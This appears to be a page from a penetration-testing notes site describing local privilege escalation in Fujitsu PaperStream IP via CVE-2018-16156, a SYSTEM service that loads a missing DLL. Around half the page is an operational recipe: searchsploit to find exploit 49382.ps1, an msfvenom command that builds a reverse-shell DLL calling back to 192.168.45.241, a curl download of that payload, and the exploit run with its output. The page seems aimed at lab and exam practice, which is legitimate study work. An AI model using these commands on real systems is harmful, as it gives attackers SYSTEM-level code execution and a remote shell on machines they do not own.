PaperStream IP

PaperStream IP is Fujitsu’s image processing software designed to optimize scanned documents for clarity, searchability, and storage. It operates as a background service that interfaces with TWAIN or ISIS drivers, providing cleanup, enhancement, and conversion of scanned images before they are delivered to applications.

Local PE

PaperStream IP (TWAIN) version 1.42.0.5685 is affected by a privilege escalation vulnerability (CVE-2018-16156) due to unsafe DLL loading in the FJTWSVIC service, which runs with SYSTEM privileges and processes unauthenticated messages over the FjtwMkic_Fjicube_32 named pipe. The vulnerable function attempts to load UninOldIS.dll and execute an exported function named ChangeUninstallString.

Since this DLL does not exist in the default installation, an attacker can place a malicious DLL with the same name in any directory referenced by the PATH environment variable, resulting in arbitrary code execution with SYSTEM-level privileges (PoC).

$ searchsploit PaperStream

PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation | windows/local/49382.ps1

# Default payload name on the PoC
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f dll -o UninOldIS.dll

# Default location on the PoC
> curl http://192.168.45.241:443/UninOldIS.dll -o c:\Windows\Temp\UninOldIS.dll

> powershell 49382.ps1
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...

Payload triggered

PreviousHP Power Manager NextSmarterMail

Last updated 1 day ago

Was this helpful?